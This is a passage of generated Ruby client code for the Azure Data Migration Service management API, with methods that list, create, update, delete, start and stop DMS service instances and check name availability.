      query_params: {'api-version' => @client.api_version},
      body: request_content,
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:post, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 200 is the only success status; other codes raise with the parsed
    # error payload attached.
    unless status_code == 200
      error_model = JSON.load(response_content)
      fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
    end

    # Copy tracing headers from the HTTP response onto the result object.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
    # Deserialize Response into a NameAvailabilityResponse model.
    if status_code == 200
      begin
        parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
        result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityResponse.mapper()
        result.body = @client.deserialize(result_mapper, parsed_response)
      rescue Exception => e
        fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
      end
    end

    result
  end

  promise.execute
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<DataMigrationService>] operation results.
#
def list_by_resource_group(group_name, custom_headers:nil)
  # Fetch the first page lazily, then walk every subsequent page so the
  # caller receives the complete, flattened item list.
  lazy_result = list_by_resource_group_as_lazy(group_name, custom_headers: custom_headers)
  lazy_result.get_all_items
end
#
# Get services in resource group
#
# Identical to #list_by_resource_group, but returns the full operation
# response so callers can inspect the status code and response headers.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_by_resource_group_with_http_info(group_name, custom_headers:nil)
  list_by_resource_group_async(group_name,
                               custom_headers: custom_headers).value!
end
#
# Get services in resource group
#
# The Services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# resource group.
#
# @param group_name [String] Name of the resource group
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_by_resource_group_async(group_name, custom_headers:nil)
  # Validate required client state and arguments before issuing the request.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, 'group_name is nil' if group_name.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: fresh correlation id per request, plus preferred language.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
  path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name},
      query_params: {'api-version' => @client.api_version},
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:get, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 200 is the only success status; other codes raise with the parsed
    # error payload attached.
    unless status_code == 200
      error_model = JSON.load(response_content)
      fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
    end

    # Copy tracing headers from the HTTP response onto the result object.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
    # Deserialize Response into one page of services (DataMigrationServiceList).
    if status_code == 200
      begin
        parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
        result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
        result.body = @client.deserialize(result_mapper, parsed_response)
      rescue Exception => e
        fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
      end
    end

    result
  end

  promise.execute
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Array<DataMigrationService>] operation results.
#
def list(custom_headers:nil)
  # Fetch the first page lazily, then walk every subsequent page so the
  # caller receives the complete, flattened item list.
  lazy_result = list_as_lazy(custom_headers: custom_headers)
  lazy_result.get_all_items
end
#
# Get services in subscription
#
# Identical to #list, but returns the full operation response so callers can
# inspect the status code and response headers.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def list_with_http_info(custom_headers:nil)
  list_async(custom_headers: custom_headers).value!
end
#
# Get services in subscription
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This method returns a list of service resources in a
# subscription.
#
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def list_async(custom_headers:nil)
  # Validate required client state before issuing the request.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: fresh correlation id per request, plus preferred language.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
  path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/services'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id},
      query_params: {'api-version' => @client.api_version},
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:get, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 200 is the only success status; other codes raise with the parsed
    # error payload attached.
    unless status_code == 200
      error_model = JSON.load(response_content)
      fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
    end

    # Copy tracing headers from the HTTP response onto the result object.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
    # Deserialize Response into one page of services (DataMigrationServiceList).
    if status_code == 200
      begin
        parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
        result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationServiceList.mapper()
        result.body = @client.deserialize(result_mapper, parsed_response)
      rescue Exception => e
        fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
      end
    end

    result
  end

  promise.execute
end
#
# Check name validity and availability
#
# This method checks whether a proposed top-level resource name is valid and
# available.
#
# @param location [String] The Azure region of the operation
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [NameAvailabilityResponse] operation results.
#
def check_name_availability(location, parameters, custom_headers:nil)
  # Block on the async variant and unwrap the deserialized body, if any.
  result = check_name_availability_async(location, parameters, custom_headers: custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Check name validity and availability
#
# Identical to #check_name_availability, but returns the full operation
# response so callers can inspect the status code and response headers.
#
# @param location [String] The Azure region of the operation
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def check_name_availability_with_http_info(location, parameters, custom_headers:nil)
  check_name_availability_async(location, parameters,
                                custom_headers: custom_headers).value!
end
#
# Check name validity and availability
#
# This method checks whether a proposed top-level resource name is valid and
# available.
#
# @param location [String] The Azure region of the operation
# @param parameters [NameAvailabilityRequest] Requested name to validate
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
def check_name_availability_async(location, parameters, custom_headers:nil)
  # Validate required client state and arguments before issuing the request.
  fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
  fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
  fail ArgumentError, 'location is nil' if location.nil?
  fail ArgumentError, 'parameters is nil' if parameters.nil?

  request_headers = {}
  request_headers['Content-Type'] = 'application/json; charset=utf-8'

  # Set Headers: fresh correlation id per request, plus preferred language.
  request_headers['x-ms-client-request-id'] = SecureRandom.uuid
  request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?

  # Serialize Request: map the NameAvailabilityRequest model to JSON for the
  # POST body (nil parameters would have been rejected above).
  request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityRequest.mapper()
  request_content = @client.serialize(request_mapper, parameters)
  request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil

  path_template = 'subscriptions/{subscriptionId}/providers/Microsoft.DataMigration/locations/{location}/checkNameAvailability'

  request_url = @base_url || @client.base_url

  options = {
      middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
      path_params: {'subscriptionId' => @client.subscription_id,'location' => location},
      query_params: {'api-version' => @client.api_version},
      body: request_content,
      headers: request_headers.merge(custom_headers || {}),
      base_url: request_url
  }
  promise = @client.make_request_async(:post, path_template, options)

  promise = promise.then do |result|
    http_response = result.response
    status_code = http_response.status
    response_content = http_response.body
    # 200 is the only success status; other codes raise with the parsed
    # error payload attached.
    unless status_code == 200
      error_model = JSON.load(response_content)
      fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
    end

    # Copy tracing headers from the HTTP response onto the result object.
    result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
    result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
    result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
    # Deserialize Response into a NameAvailabilityResponse model.
    if status_code == 200
      begin
        parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
        result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::NameAvailabilityResponse.mapper()
        result.body = @client.deserialize(result_mapper, parsed_response)
      rescue Exception => e
        fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
      end
    end

    result
  end

  promise.execute
end
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def begin_create_or_update(parameters, group_name, service_name, custom_headers:nil)
  # Synchronous wrapper: block on the async PUT and unwrap the deserialized
  # DataMigrationService body (nil when there is no response).
  result = begin_create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_create_or_update_with_http_info(parameters, group_name, service_name, custom_headers:nil)
  # Block on the async PUT and hand back the full AzureOperationResponse
  # (status, headers, and deserialized body) instead of just the body.
  operation_response = begin_create_or_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
  operation_response
end
#
# Create or update DMS Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PUT method creates a new service or updates an
# existing one. When a service is updated, existing child resources (i.e.
# tasks) are unaffected. Services currently support a single kind, "vm", which
# refers to a VM-based service, although other kinds may be added in the
# future. This method can change the kind, SKU, and network of the service, but
# if tasks are currently running (i.e. the service is busy), this will fail
# with 400 Bad Request ("ServiceIsBusy"). The provider will reply when
# successful with 200 OK or 201 Created. Long-running operations use the
# provisioningState property.
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Issues the PUT that creates or replaces a DMS service resource and returns a
# promise for the HTTP response. Accepted statuses: 200/201 (body returned),
# 202 (long-running operation accepted, no body deserialized).
def begin_create_or_update_async(parameters, group_name, service_name, custom_headers:nil)
# Validate required arguments up front so a bad call fails fast, before any I/O.
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
request_content = @client.serialize(request_mapper, parameters)
# quirks_mode allows generating JSON for non-object top-level values.
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:put, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Anything outside 200/201/202 is surfaced as an HttpOperationError.
unless status_code == 200 || status_code == 201 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
# Deserialize Response
if status_code == 201
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_delete(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
  # Synchronous wrapper: wait for the DELETE to complete. The operation has
  # no meaningful response body, so always return nil.
  begin_delete_async(group_name, service_name, delete_running_tasks:delete_running_tasks, custom_headers:custom_headers).value!
  nil
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_delete_with_http_info(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
  # Block on the async DELETE and return the full HTTP operation response.
  operation_response = begin_delete_async(group_name, service_name, delete_running_tasks:delete_running_tasks, custom_headers:custom_headers).value!
  operation_response
end
#
# Delete DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The DELETE method deletes a service. Any running tasks
# will be canceled.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param delete_running_tasks [Boolean] Delete the resource even if it contains
# running tasks
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Issues the DELETE for a DMS service resource and returns a promise for the
# HTTP response. Accepted statuses: 200, 202 (accepted, long-running), 204
# (already gone). No response body is deserialized.
def begin_delete_async(group_name, service_name, delete_running_tasks:nil, custom_headers:nil)
# Validate required arguments up front so a bad call fails fast, before any I/O.
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'deleteRunningTasks' => delete_running_tasks,'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:delete, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Anything outside 200/202/204 is surfaced as an HttpOperationError.
unless status_code == 200 || status_code == 202 || status_code == 204
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [DataMigrationService] operation results.
#
def begin_update(parameters, group_name, service_name, custom_headers:nil)
  # Synchronous wrapper: block on the async PATCH and unwrap the deserialized
  # DataMigrationService body (nil when there is no response).
  result = begin_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
  result.nil? ? nil : result.body
end
#
# Update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_update_with_http_info(parameters, group_name, service_name, custom_headers:nil)
  # Block on the async PATCH and return the full HTTP operation response.
  operation_response = begin_update_async(parameters, group_name, service_name, custom_headers:custom_headers).value!
  operation_response
end
#
# Update DMS Service Instance
#
# The services resource is the top-level resource that represents the Data
# Migration Service. The PATCH method updates an existing service. This method
# can change the kind, SKU, and network of the service, but if tasks are
# currently running (i.e. the service is busy), this will fail with 400 Bad
# Request ("ServiceIsBusy").
#
# @param parameters [DataMigrationService] Information about the service
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Issues the PATCH that updates an existing DMS service resource and returns a
# promise for the HTTP response. Accepted statuses: 200 (body returned) and
# 202 (long-running operation accepted, no body deserialized).
def begin_update_async(parameters, group_name, service_name, custom_headers:nil)
# Validate required arguments up front so a bad call fails fast, before any I/O.
fail ArgumentError, 'parameters is nil' if parameters.nil?
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
# Serialize Request
request_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
request_content = @client.serialize(request_mapper, parameters)
# quirks_mode allows generating JSON for non-object top-level values.
request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
body: request_content,
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:patch, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Anything outside 200/202 is surfaced as an HttpOperationError.
unless status_code == 200 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
# Deserialize Response
if status_code == 200
begin
parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content)
result_mapper = Azure::DataMigration::Mgmt::V2018_03_15_preview::Models::DataMigrationService.mapper()
result.body = @client.deserialize(result_mapper, parsed_response)
rescue Exception => e
fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result)
end
end
result
end
promise.execute
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_start(group_name, service_name, custom_headers:nil)
  # Synchronous wrapper: wait for the start action to be accepted. The
  # operation has no meaningful response body, so always return nil.
  begin_start_async(group_name, service_name, custom_headers:custom_headers).value!
  nil
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_start_with_http_info(group_name, service_name, custom_headers:nil)
  # Block on the async start action and return the full HTTP operation response.
  operation_response = begin_start_async(group_name, service_name, custom_headers:custom_headers).value!
  operation_response
end
#
# Start service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action starts the service and the service can be used
# for data migration.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Issues the POST to the /start action of a DMS service and returns a promise
# for the HTTP response. Accepted statuses: 200 and 202 (long-running). No
# response body is deserialized.
def begin_start_async(group_name, service_name, custom_headers:nil)
# Validate required arguments up front so a bad call fails fast, before any I/O.
fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil?
fail ArgumentError, 'group_name is nil' if group_name.nil?
fail ArgumentError, 'service_name is nil' if service_name.nil?
fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil?
request_headers = {}
request_headers['Content-Type'] = 'application/json; charset=utf-8'
# Set Headers
request_headers['x-ms-client-request-id'] = SecureRandom.uuid
request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil?
path_template = 'subscriptions/{subscriptionId}/resourceGroups/{groupName}/providers/Microsoft.DataMigration/services/{serviceName}/start'
request_url = @base_url || @client.base_url
options = {
middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]],
path_params: {'subscriptionId' => @client.subscription_id,'groupName' => group_name,'serviceName' => service_name},
query_params: {'api-version' => @client.api_version},
headers: request_headers.merge(custom_headers || {}),
base_url: request_url
}
promise = @client.make_request_async(:post, path_template, options)
promise = promise.then do |result|
http_response = result.response
status_code = http_response.status
response_content = http_response.body
# Anything outside 200/202 is surfaced as an HttpOperationError.
unless status_code == 200 || status_code == 202
error_model = JSON.load(response_content)
fail MsRest::HttpOperationError.new(result.request, http_response, error_model)
end
# Propagate Azure tracing headers onto the result for diagnostics.
result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil?
result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil?
result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil?
result
end
promise.execute
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
#
def begin_stop(group_name, service_name, custom_headers:nil)
  # Synchronous wrapper: wait for the stop action to be accepted. The
  # operation has no meaningful response body, so always return nil.
  begin_stop_async(group_name, service_name, custom_headers:custom_headers).value!
  nil
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param custom_headers [Hash{String => String}] A hash of custom headers that
# will be added to the HTTP request.
#
# @return [MsRestAzure::AzureOperationResponse] HTTP response information.
#
def begin_stop_with_http_info(group_name, service_name, custom_headers:nil)
  # Block on the async stop action and return the full HTTP operation response.
  operation_response = begin_stop_async(group_name, service_name, custom_headers:custom_headers).value!
  operation_response
end
#
# Stop service
#
# The services resource is the top-level resource that represents the Data
# Migration Service. This action stops the service and the service cannot be
# used for data migration. The service owner won't be billed when the service
# is stopped.
#
# @param group_name [String] Name of the resource group
# @param service_name [String] Name of the service
# @param [Hash{String => String}] A hash of custom headers that will be added
# to the HTTP request.
#
# @return [Concurrent::Promise] Promise object which holds the HTTP response.
#
# Issues the POST to the /stop action of a DMS service and returns a promise
# for the HTTP response. Accepted statuses: 200 and 202 (long-running). No
# response body is deserialized.
def begin_stop_async(group_name, service_name, custom_headers:nil)
# Validate required arguments up front so a bad call fails fast, before any I/O.
